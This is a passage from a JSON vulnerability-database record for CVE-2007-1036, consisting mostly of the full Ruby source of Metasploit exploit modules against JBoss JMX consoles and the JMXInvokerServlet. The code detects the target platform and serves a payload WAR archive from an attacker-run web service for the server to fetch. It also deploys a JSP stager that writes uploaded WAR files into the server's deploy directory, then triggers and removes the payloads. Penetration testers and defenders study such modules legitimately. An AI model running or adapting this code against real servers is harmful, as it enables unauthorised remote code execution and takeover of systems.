datastore['VERBOSE']\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\r\n\t\t\tif (attempt < num_attempts - 1)\r\n\t\t\t\tmsg << \", retrying in 5 seconds...\"\r\n\t\t\t\tprint_status(msg) if datastore['VERBOSE']\r\n\t\t\t\tselect(nil, nil, nil, 5)\r\n\t\t\telse\r\n\t\t\t\tprint_error(msg)\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\r\n\r\n\tdef auto_target\r\n\t\tprint_status(\"Attempting to automatically select a target\")\r\n\r\n\t\tplat = detect_platform()\r\n\t\tarch = detect_architecture()\r\n\r\n\t\treturn nil if (not arch or not plat)\r\n\r\n\t\t# see if we have a match\r\n\t\ttargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\r\n\r\n\t\t# no matching target found\r\n\t\treturn nil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the target platform\r\n\tdef detect_platform\r\n\t\tprint_status(\"Attempting to automatically detect the platform\")\r\n\t\tres = send_serialized_request(\"osname.bin\")\r\n\r\n\t\tif (res.body =~ /(Linux|FreeBSD|Windows)/i)\r\n\t\t\tos = $1\r\n\t\t\tif (os =~ /Linux/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /FreeBSD/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /Windows/i)\r\n\t\t\t\treturn 'win'\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the architecture\r\n\tdef detect_architecture()\r\n\t\tprint_status(\"Attempting to automatically detect the architecture\")\r\n\t\tres = send_serialized_request(\"osarch.bin\")\r\n\t\tif (res.body =~ /(i386|x86)/i)\r\n\t\t\tarch = $1\r\n\t\t\tif (arch =~ /i386|x86/i)\r\n\t\t\t\treturn ARCH_X86\r\n\t\t\t\t# TODO, more\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21080/"}, {"lastseen": "2016-02-01T23:35:34", "description": "JBoss JMX Console Deployer Upload and Execute. CVE-2007-1036. Remote exploits for multiple platform", "published": "2010-10-19T00:00:00", "type": "exploitdb", "title": "JBoss JMX Console Deployer Upload and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1036"], "modified": "2010-10-19T00:00:00", "id": "EDB-ID:16318", "href": "https://www.exploit-db.com/exploits/16318/", "sourceData": "##\r\n# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::HttpServer\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'JBoss JMX Console Deployer Upload and Execute',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have\r\n\t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\r\n\t\t\t\tusing the jboss.system:MainDeployer functionality. To accomplish this, a\r\n\t\t\t\ttemporary HTTP server is created to serve a WAR archive containing our\r\n\t\t\t\tpayload. This method will only work if the target server allows outbound\r\n\t\t\t\tconnections to us.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'jduck', 'Patrick Hof' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10754 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1036' ],\r\n\t\t\t\t\t[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST\r\n\t\t\t\t\t[ 'OSVDB', '33744' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => [ 'win', 'linux' ],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# detect via /manager/serverinfo\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Platform specific targets only\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Java version\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Java Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Payload' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t\tOptString.new('USERNAME', [ false, 'The username to authenticate as' ]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, 'The password for the specified username' ]),\r\n\t\t\t\tOptString.new('SHELL',\t\t[ false, 'The system shell to use', 'automatic' ]),\r\n\t\t\t\tOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\r\n\t\t\t\tOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\r\n\t\t\t\tOptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),\r\n\t\t\t\tOptString.new('VERB', [ true, 'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),\r\n\t\t\t\tOptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef auto_target\r\n\t\tprint_status(\"Attempting to automatically select a target...\")\r\n\r\n\t\tif not (plat = detect_platform())\r\n\t\t\traise RuntimeError, 'Unable to detect platform!'\r\n\t\tend\r\n\r\n\t\t# TODO: detection requires HTML parsing\r\n\t\tarch = ARCH_X86\r\n\r\n\t\t# see if we have a match\r\n\t\ttargets.each { |t|\r\n\t\t\tif (t['Platform'] == plat) and (t['Arch'] == arch)\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\t# no matching target found\r\n\t\treturn nil\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tdatastore['BasicAuthUser'] = datastore['USERNAME']\r\n\t\tdatastore['BasicAuthPass'] = datastore['PASSWORD']\r\n\r\n\t\tjsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))\r\n\t\tapp_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))\r\n\r\n\t\tverb = 'GET'\r\n\t\tif (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')\r\n\t\t\tverb = 'HEAD'\r\n\t\tend\r\n\r\n\t\tmytarget = target\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tmytarget = auto_target()\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, \"Unable to automatically select a target\"\r\n\t\t\tend\r\n\t\t\tprint_status(\"Automatically selected target \\\"#{mytarget.name}\\\"\")\r\n\t\telse\r\n\t\t\tprint_status(\"Using manually select target \\\"#{mytarget.name}\\\"\")\r\n\t\tend\r\n\t\tarch = mytarget.arch\r\n\r\n\t\t# Find out which shell if we're using a Java target\r\n\t\tif (mytarget.name =~ /Java/)\r\n\t\t\tif not (plat = detect_platform())\r\n\t\t\t\traise RuntimeError, 'Unable to detect platform!'\r\n\t\t\tend\r\n\r\n\t\t\tcase plat\r\n\t\t\twhen 'linux'\r\n\t\t\t\tdatastore['SHELL'] = '/bin/sh'\r\n\t\t\twhen 'win'\r\n\t\t\t\tdatastore['SHELL'] = 'cmd.exe'\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"SHELL set to #{datastore['SHELL']}\")\r\n\t\telse\r\n\t\t\t# set arch/platform from the target\r\n\t\t\tplat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]\r\n\t\tend\r\n\r\n\t\t# We must regenerate the payload in case our auto-magic changed something.\r\n\t\treturn if ((p = exploit_regenerate_payload(plat, arch)) == nil)\r\n\r\n\t\t# Generate the WAR containing the payload\r\n\t\tif (mytarget.name =~ /Java/)\r\n\t\t\t@war_data = Msf::Util::EXE.to_war(p.encoded,\r\n\t\t\t\t{\r\n\t\t\t\t\t:app_name => app_base,\r\n\t\t\t\t\t:jsp_name => jsp_name\r\n\t\t\t\t})\r\n\t\telse\r\n\t\t\texe = generate_payload_exe(\r\n\t\t\t\t{\r\n\t\t\t\t\t:code => p.encoded,\r\n\t\t\t\t\t:arch => arch,\r\n\t\t\t\t\t:platform => plat\r\n\t\t\t\t})\r\n\t\t\t@war_data = Msf::Util::EXE.to_jsp_war(exe,\r\n\t\t\t\t{\r\n\t\t\t\t\t:app_name => app_base,\r\n\t\t\t\t\t:jsp_name => jsp_name\r\n\t\t\t\t})\r\n\t\tend\r\n\r\n\r\n\t\t#\r\n\t\t# UPLOAD\r\n\t\t#\r\n\t\tresource_uri = '/' + app_base + '.war'\r\n\t\tservice_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri\r\n\t\tprint_status(\"Starting up our web service on #{service_url} ...\")\r\n\t\tstart_service({'Uri' => {\r\n\t\t\t\t'Proc' => Proc.new { |cli, req|\r\n\t\t\t\t\ton_request_uri(cli, req)\r\n\t\t\t\t},\r\n\t\t\t\t'Path' => resource_uri\r\n\t\t\t}})\r\n\r\n\t\tif (datastore['WARHOST'])\r\n\t\t\tservice_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri\r\n\t\tend\r\n\r\n\t\tprint_status(\"Asking the JBoss server to deploy (via MainDeployer) #{service_url}\")\r\n\t\tif (verb == \"POST\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t\t'method' => verb,\r\n\t\t\t\t\t'uri' => datastore['PATH'] + '/HtmlAdaptor',\r\n\t\t\t\t\t'vars_post' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'action' => 'invokeOpByName',\r\n\t\t\t\t\t\t\t'name' => 'jboss.system:service=MainDeployer',\r\n\t\t\t\t\t\t\t'methodName' => 'deploy',\r\n\t\t\t\t\t\t\t'argType' => 'java.lang.String',\r\n\t\t\t\t\t\t\t'arg0' => service_url\r\n\t\t\t\t\t\t}\r\n\t\t\t\t})\r\n\t\telse\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t\t'method' => verb,\r\n\t\t\t\t\t'uri' => datastore['PATH'] + '/HtmlAdaptor',\r\n\t\t\t\t\t'vars_get' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'action' => 'invokeOpByName',\r\n\t\t\t\t\t\t\t'name' => 'jboss.system:service=MainDeployer',\r\n\t\t\t\t\t\t\t'methodName' => 'deploy',\r\n\t\t\t\t\t\t\t'argType' => 'java.lang.String',\r\n\t\t\t\t\t\t\t'arg0' => service_url\r\n\t\t\t\t\t\t}\r\n\t\t\t\t})\r\n\t\tend\r\n\t\tif (! res)\r\n\t\t\traise RuntimeError, \"Unable to deploy WAR archive [No Response]\"\r\n\t\tend\r\n\t\tif (res.code < 200 or res.code >= 300)\r\n\t\t\tcase res.code\r\n\t\t\twhen 401\r\n\t\t\t\tprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\")\r\n\t\t\tend\r\n\t\t\traise RuntimeError, \"Upload to deploy WAR archive [#{res.code} #{res.message}]\"\r\n\t\tend\r\n\r\n\t\t# wait for the data to be sent\r\n\t\tprint_status(\"Waiting for the server to request the WAR archive....\")\r\n\t\twaited = 0\r\n\t\twhile (not @war_sent)\r\n\t\t\tselect(nil, nil, nil, 1)\r\n\t\t\twaited += 1\r\n\t\t\tif (waited > 30)\r\n\t\t\t\traise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tprint_status(\"Shutting down the web service...\")\r\n\t\tstop_service\r\n\r\n\r\n\t\t#\r\n\t\t# EXECUTE\r\n\t\t#\r\n\t\tprint_status(\"Executing #{app_base}...\")\r\n\r\n\t\t# JBoss might need some time for the deployment. Try 5 times at most and\r\n\t\t# wait 3 seconds inbetween tries\r\n\t\tnum_attempts = 5\r\n\t\tnum_attempts.times { |attempt|\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t\t'uri' => '/' + app_base + '/' + jsp_name + '.jsp',\r\n\t\t\t\t\t'method' => verb\r\n\t\t\t\t}, 20)\r\n\r\n\t\t\tmsg = nil\r\n\t\t\tif (! res)\r\n\t\t\t\tmsg = \"Execution failed on #{app_base} [No Response]\"\r\n\t\t\telsif (res.code < 200 or res.code >= 300)\r\n\t\t\t\tmsg = \"Execution failed on #{app_base} [#{res.code} #{res.message}]\"\r\n\t\t\telsif (res.code == 200)\r\n\t\t\t\tprint_good(\"Successfully triggered payload at '#{uri}'\")\r\n\t\t\t\tbreak\r\n\t\t\tend\r\n\r\n\t\t\tif (attempt < num_attempts - 1)\r\n\t\t\t\tmsg << \", retrying in 3 seconds...\"\r\n\t\t\t\tprint_error(msg)\r\n\r\n\t\t\t\tselect(nil, nil, nil, 3)\r\n\t\t\telse\r\n\t\t\t\tprint_error(msg)\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\t#\r\n\t\t# DELETE\r\n\t\t#\r\n\t\t# XXX: Does undeploy have an invokeByName?\r\n\t\t#\r\n\t\tprint_status(\"Undeploying #{app_base} ...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => verb,\r\n\t\t\t'uri' => datastore['PATH'] + '/HtmlAdaptor',\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'action' => 'invokeOpByName',\r\n\t\t\t\t\t'name' => 'jboss.system:service=MainDeployer',\r\n\t\t\t\t\t'methodName' => 'methodName=undeploy',\r\n\t\t\t\t\t'argType' => 'java.lang.String',\r\n\t\t\t\t\t'arg0' => app_base\r\n\t\t\t\t}\r\n\t\t}, 20)\r\n\t\tif (! res)\r\n\t\t\tprint_error(\"WARNING: Undeployment failed on #{app_base} [No Response]\")\r\n\t\telsif (res.code < 200 or res.code >= 300)\r\n\t\t\tprint_error(\"WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]\")\r\n\t\tend\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\r\n\t# Handle incoming requests from the server\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t#print_status(\"on_request_uri called: #{request.inspect}\")\r\n\t\tif (not @war_data)\r\n\t\t\tprint_error(\"A request came in, but the WAR archive wasn't ready yet!\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"Sending the WAR archive to the server...\")\r\n\t\tsend_response(cli, @war_data)\r\n\t\t@war_sent = true\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the target platform\r\n\tdef detect_platform()\r\n\t\tprint_status(\"Attempting to automatically detect the platform...\")\r\n\r\n\t\tpath = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'\r\n\t\tres = send_request_raw(\r\n\t\t\t{\r\n\t\t\t\t'uri' => path\r\n\t\t\t}, 20)\r\n\r\n\t\tif (not res) or (res.code != 200)\r\n\t\t\tprint_error(\"Failed: Error requesting #{path}\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tif (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\\/td>/m)\r\n\t\t\tos = $1\r\n\t\t\tif (os =~ /Linux/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /Windows/i)\r\n\t\t\t\treturn 'win'\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16318/"}], "metasploit": [{"lastseen": "2020-06-19T00:05:41", "description": "This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.\n", "published": "2012-09-03T17:50:16", "type": "metasploit", "title": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1036"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/HTTP/JBOSS_INVOKE_DEPLOY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /JBoss/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',\n 'Description' => %q{\n This module can be used to execute a payload on JBoss servers that have an\n exposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking\n the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\n to finally upload the selected payload to the target. The DeploymentFileRepository\n methods are only available on Jboss 4.x and 5.x.\n },\n 'Author' => [\n 'Patrick Hof', # Vulnerability discovery, analysis and PoC\n 'Jens Liebchen', # Vulnerability discovery, analysis and PoC\n 'h0ng10' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-1036' ],\n [ 'OSVDB', '33744' ],\n [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\n ],\n 'DisclosureDate' => 'Feb 20 2007',\n 'Privileged' => true,\n 'Platform' => %w{ java linux win },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' =>\n [\n\n # do target detection but java meter by default\n [ 'Automatic',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n }\n ],\n\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n },\n ],\n\n #\n # Platform specific targets\n #\n [ 'Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n },\n ],\n\n [ 'Linux x86',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n },\n ],\n ],\n\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\n OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\n OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),\n ])\n\n end\n\n def check\n res = send_serialized_request('version')\n if res.nil?\n vprint_error('Connection timed out')\n return Exploit::CheckCode::Unknown\n elsif res.code != 200\n vprint_error(\"Unable to request version, returned http code is: #{res.code.to_s}\")\n return Exploit::CheckCode::Unknown\n end\n\n # Check if the version is supported by this exploit\n return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/\n return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/\n return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/\n\n if res.body =~ /ServletException/ # Simple check, if we caused an exception.\n vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if target.name =~ /Automatic/\n mytarget = auto_target\n fail_with(Failure::BadConfig, 'Unable to automatically select a target') unless mytarget\n print_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\")\n else\n print_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\")\n end\n\n # We use a already serialized stager to deploy the final payload\n regex_stager_app_base = rand_text_alpha(14)\n regex_stager_jsp_name = rand_text_alpha(14)\n name_parameter = rand_text_alpha(8)\n content_parameter = rand_text_alpha(8)\n stager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\"\n\n replace_values = {\n 'regex_app_base' => regex_stager_app_base,\n 'regex_jsp_name' => regex_stager_jsp_name,\n 'jsp_code' => generate_stager(name_parameter, content_parameter)\n }\n\n print_status('Deploying stager')\n send_serialized_request('installstager', replace_values)\n print_status(\"Calling stager: #{stager_uri}\")\n call_uri_mtimes(stager_uri, 5, 'GET')\n\n # Generate the WAR with the payload which will be uploaded through the stager\n app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\n jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\n\n war_data = payload.encoded_war({\n :app_name => app_base,\n :jsp_name => jsp_name,\n :arch => mytarget.arch,\n :platform => mytarget.platform\n }).to_s\n\n b64_war = Rex::Text.encode_base64(war_data)\n print_status(\"Uploading payload through stager\")\n res = send_request_cgi({\n 'uri' => stager_uri,\n 'method' => \"POST\",\n 'vars_post' =>\n {\n name_parameter => app_base,\n content_parameter => b64_war\n }\n })\n\n payload_uri = \"/#{app_base}/#{jsp_name}.jsp\"\n print_status(\"Calling payload: \" + payload_uri)\n res = call_uri_mtimes(payload_uri,5, 'GET')\n\n # Remove the payload through stager\n print_status('Removing payload through stager')\n delete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\"\n res = send_request_cgi({'uri' => delete_payload_uri})\n\n # Remove the stager\n print_status('Removing stager')\n send_serialized_request('removestagerfile', replace_values)\n send_serialized_request('removestagerdirectory', replace_values)\n\n handler\n end\n\n def generate_stager(name_param, content_param)\n war_file = rand_text_alpha(4+rand(4))\n file_content = rand_text_alpha(4+rand(4))\n jboss_home = rand_text_alpha(4+rand(4))\n decoded_content = rand_text_alpha(4+rand(4))\n path = rand_text_alpha(4+rand(4))\n fos = rand_text_alpha(4+rand(4))\n name = rand_text_alpha(4+rand(4))\n file = rand_text_alpha(4+rand(4))\n\n stager_script = <<-EOT\n<%@page import=\"java.io.*,\n java.util.*,\n sun.misc.BASE64Decoder\"\n%>\n<%\nString #{file_content} = \"\";\nString #{war_file} = \"\";\nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\");\nif (request.getParameter(\"#{content_param}\") != null){\ntry {\n#{file_content} = request.getParameter(\"#{content_param}\");\n#{war_file} = request.getParameter(\"#{name_param}\");\nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});\nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\";\nFileOutputStream #{fos} = new FileOutputStream(#{path});\n#{fos}.write(#{decoded_content});\n#{fos}.close();\n}\ncatch(Exception e) {}\n}\nelse {\ntry{\nString #{name} = request.getParameter(\"#{name_param}\");\nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\";\nnew File(#{file}).delete();\n}\ncatch(Exception e) {}\n}\n\n%>\nEOT\n\n end\n\n\n def send_serialized_request(operation , replace_params = {})\n data = ''\n case operation\n when 'version'\n data = build_get_version.encode\n when 'osname'\n data = build_get_os.encode\n when 'osarch'\n data = build_get_arch.encode\n when 'installstager'\n data = build_install_stager(\n war_name: replace_params['regex_app_base'],\n jsp_name: replace_params['regex_jsp_name'],\n data: replace_params['jsp_code']\n ).encode\n when 'removestagerfile'\n data = build_delete_stager_file(\n dir: \"#{replace_params['regex_app_base']}.war\",\n file: replace_params['regex_jsp_name'],\n extension: '.jsp'\n ).encode\n when 'removestagerdirectory'\n data = build_delete_stager_file(\n dir: './',\n file: replace_params['regex_app_base'],\n extension: '.war'\n ).encode\n else\n fail_with(Failure::Unknown, \"#{peer} - Unexpected operation\")\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'data' => data,\n 'headers' =>\n {\n 'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',\n 'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'\n }\n }, 25)\n\n\n unless res && res.code == 200\n print_error(\"Failed: Error requesting preserialized request #{operation}\")\n return nil\n end\n\n res\n end\n\n def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)\n # JBoss might need some time for the deployment. Try 5 times at most and\n # wait 5 seconds inbetween tries\n num_attempts.times do |attempt|\n if verb == \"POST\"\n res = send_request_cgi(\n {\n 'uri' => uri,\n 'method' => verb,\n 'data' => data\n }, 5)\n else\n uri += \"?#{data}\" unless data.nil?\n res = send_request_cgi(\n {\n 'uri' => uri,\n 'method' => verb\n }, 30)\n end\n\n msg = nil\n if res.nil?\n msg = \"Execution failed on #{uri} [No Response]\"\n elsif res.code < 200 || res.code >= 300\n msg = \"http request failed to #{uri} [#{res.code}]\"\n elsif res.code == 200\n vprint_good(\"Successfully called '#{uri}'\")\n return res\n end\n\n if attempt < num_attempts - 1\n msg << ', retrying in 5 seconds...'\n vprint_status(msg)\n select(nil, nil, nil, 5)\n else\n print_error(msg)\n return res\n end\n end\n end\n\n\n def auto_target\n print_status('Attempting to automatically select a target')\n\n plat = detect_platform\n arch = detect_architecture\n\n return nil unless arch && plat\n\n # see if we have a match\n targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\n\n # no matching target found\n return nil\n end\n\n # Try to autodetect the target platform\n def detect_platform\n print_status('Attempting to automatically detect the platform')\n res = send_serialized_request('osname')\n\n if res.body =~ /(Linux|FreeBSD|Windows)/i\n os = $1\n if os =~ /Linux/i\n return 'linux'\n elsif os =~ /FreeBSD/i\n return 'linux'\n elsif os =~ /Windows/i\n return 'win'\n end\n end\n nil\n end\n\n # Try to autodetect the architecture\n def detect_architecture\n print_status('Attempting to automatically detect the architecture')\n res = send_serialized_request('osarch')\n if res.body =~ /(i386|x86)/i\n arch = $1\n if arch =~ /i386|x86/i\n return ARCH_X86\n # TODO, more\n end\n end\n nil\n end\n\n def build_get_version\n builder = Rex::Java::Serialization::Builder.new\n\n object_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=Server')\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n stream.contents << object_array\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'Version')\n\n build_invocation(stream)\n end\n\n def build_get_os\n builder = Rex::Java::Serialization::Builder.new\n\n object_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n stream.contents << object_array\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSName')\n\n build_invocation(stream)\n end\n\n def build_get_arch\n builder = Rex::Java::Serialization::Builder.new\n\n object_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n stream.contents << object_array\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 